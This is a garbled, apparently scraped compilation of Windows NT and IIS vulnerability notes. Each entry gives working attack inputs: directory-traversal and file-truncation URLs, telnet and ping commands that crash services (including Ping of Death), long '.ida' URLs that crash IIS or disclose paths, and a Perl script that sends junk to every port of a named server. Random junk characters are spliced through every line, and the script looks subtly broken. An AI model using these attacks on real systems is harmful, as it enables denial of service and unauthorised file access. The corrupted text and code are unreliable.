受影響系統(tǒng):4.0,iis 1.0
; V2 N5 F ]) l6 tA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
% @7 U( N) e2 K# y! L* W- Q; L9 B: _, D' ?3 Z
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script., }$ }- x! [7 j; _* o
6 X, E% b3 j* h5 w5 y
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
2 C+ K; l+ c5 ^& q5 d
0 x/ R7 \: s2 { x# ~: g--------------------------------------------------------------------
- Q2 O0 s- y5 T; x
/ ]% r4 K8 e* q5 ^ O受影響系統(tǒng):4.0- [: R5 V2 H6 b6 W8 U
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
* Z$ X& Z" u) i
, M }& N+ g# W9 a5 Y) dIf the file 'target.bat' exists, the file will be truncated.
# }4 R/ `& z4 O8 B/ p% a
# r/ H) c4 [2 S$ Z( w9 K$ M1 u$ g8 B+ m# {7 i( R* t. u+ t. Y C
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
9 p" n+ F x/ S/ q$ _& p
" S* m, ~4 I3 |- I----------------------------------------------------------------------4 u. B+ r' d6 B/ \2 I8 C
9 \4 j3 i1 h8 g& f# k
受影響系統(tǒng):3.51,4.0
* L, H% N/ w+ ?4 sMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
1 q/ ?- T. G& e+ A7 A) J
; u+ L' F5 e8 c% w) CThe following steps;
" `: N( H( o `
7 X S5 s% H1 bTelnet to an NT 4.0 system on port 135 * r* N( p) D/ P
Type about 10 characters followed by a <CR>
9 m" l* {) `8 m" w4 S0 i% bExit Telnet / R2 h. Z' i; u1 I; `7 U6 c
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.6 n8 a' l5 U: O# U: r! H: m: A
+ |7 {' [3 \0 q/ a4 WWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
3 M" V, R. C2 ]7 z
2 `% U3 j$ O# k1 }The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
! _' W6 [+ `7 c0 q. n; L7 g y3 o9 N
If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.8 s7 Q! {# a, J+ C! n
: i; v1 P; H) q, D2 f# [+ ^
The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):% u" Z# L% `2 V8 U) m! t
8 d, T; Q) P8 `9 ~" d( m3 ?& u/*begin poke code*/4 s! E# W! \2 G/ s' D W9 g% v: _
+ @6 Z x0 U2 ^ v, {7 T8 g& l0 R: nuse Socket;, a8 w1 J" I' M; d2 g8 H1 `
use FileHandle;
, u, A* t# s7 |! w6 krequire "chat2.pl";/ s1 Q0 }& n/ j6 J) T; y
' B; E6 g5 @# }' L
$systemname = $ARGV[0] && shift;
0 A7 g: S' x$ Z' I) E- J) v/ C3 i9 |0 u8 |
$verbose = 1; # tell me what you're hitting0 h- x9 B/ i, W% N
$knownports = 1; # don't hit known problem ports7 p) k' k, D5 P$ `0 f0 a
for ($port = $0; $port<65535; $port++)
# E! V$ C7 @% i3 W( k& `, V. V! z; p* Q{5 I/ @0 E+ b% E' E+ j( ]/ v
$ D9 i0 l o( o- Y! j& J9 [: h4 J1 r1 F4 L* [, D
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
8 ~, J0 M& Y: x! D+ [" snext;2 b/ n! b# G7 Z+ Z
}3 \( [3 L ?# ^: c6 E
$fh = chat::open_port($systemname, $port);
! I7 z" Z% y+ w( W! H$ m9 Dchat::print ($fh,"This is about ten characters or more");
' z6 }1 y- \6 p" I& X" }( Q4 k/ `if ($verbose) {3 q2 T' s2 c) C* M- d
print "Trying port: $port\n";
' O2 [3 i8 r4 @+ _9 z} . H& @* I( `; K
chat::close($fh);. @- f& F/ p; d7 i
2 }; ^5 q. d2 e6 R# w/ o
}5 a8 p r- T* c1 k
/ x( ]- A' q& V7 r1 G: u1 W* X! K" }& |, q, |% o% k
/*end poke code*/3 P5 \) S( n. f# k$ `
7 ~8 H1 {3 Y U7 W6 Z( A4 lSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername$ T- e) a" ]+ r G( V
* }3 ~ i( }+ } ~: Y9 i
--------------------------------------------------------------------------------
9 C6 i; I9 B5 H. O
& b9 m* V0 X/ ~ ^0 ?/ `9 W V受影響系統(tǒng):4.03 t/ ]) _ l" ~- {
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.+ j% V* T+ w+ I5 R' t% ]
- W9 ^3 C A$ E9 H$ VThis attack causes Dr. Watson to display an alert window and to log an error: 2 H2 N; l4 l2 R& i( [6 c" |
- k9 t2 b# G" C$ y' A% ^
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
* Q; k0 `0 T' i' }2 B2 _% O5 P8 _/ S! l" @ ^1 ] e
--------------------------------------------------------------------------------
) c& Q+ h$ w- i* \5 p
$ \% K; x2 t# v受影響系統(tǒng):3.51,4.0
6 {/ F) d0 Q7 u" fLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
0 T3 I# z6 Z" O! ]8 g) o) Z/ T( j; Z1 ]
STOP: 0X0000001E
0 |7 ]+ N4 \1 u3 w2 K& o" kKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
9 T4 c! X5 [. Z; u7 L1 {" z, q' r7 r v0 s0 Q& i
-OR-6 j9 v3 G: l5 b( j2 ^; i
* ~1 Z( c1 T% j5 X: S2 ~
STOP: 0x0000000A+ |# r8 c! g* g4 O
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS' @) r0 A, y4 e
+ _9 Y- K" H& F! I9 s1 k" v' O8 }0 S1 qNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
9 b& _$ n1 B4 a; G: U: N
3 L' n' \! Y! j8 v* J--------------------------------------------------------------------------------
2 S8 |* ]# ?' V9 q: x8 {
; Z. Z# E2 n4 G7 o" C! n) L! OMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
. S! X3 d1 \7 N. Q/ V2 A$ D9 y* l& U( |
--------------------------------------------------------
, {) ^! |- z) w7 E6 ?
% Y% U0 z, \# K8 a* J/ Q4 v( p9 rIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |